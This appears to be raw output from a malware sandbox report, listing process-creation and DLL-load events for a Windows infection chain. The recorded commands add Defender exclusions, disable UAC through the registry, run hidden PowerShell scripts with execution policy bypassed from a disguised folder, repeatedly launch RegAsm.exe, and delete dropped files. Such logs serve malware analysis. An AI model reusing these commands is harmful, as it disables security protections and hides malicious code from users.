Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /k reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\AppData\Local\Temp\x.vbs"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nicme.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\cxtyy.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qtglm.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\tezxb.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\bweyr.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qndib.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\bnltz.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #by-unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\nzans.ps1"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
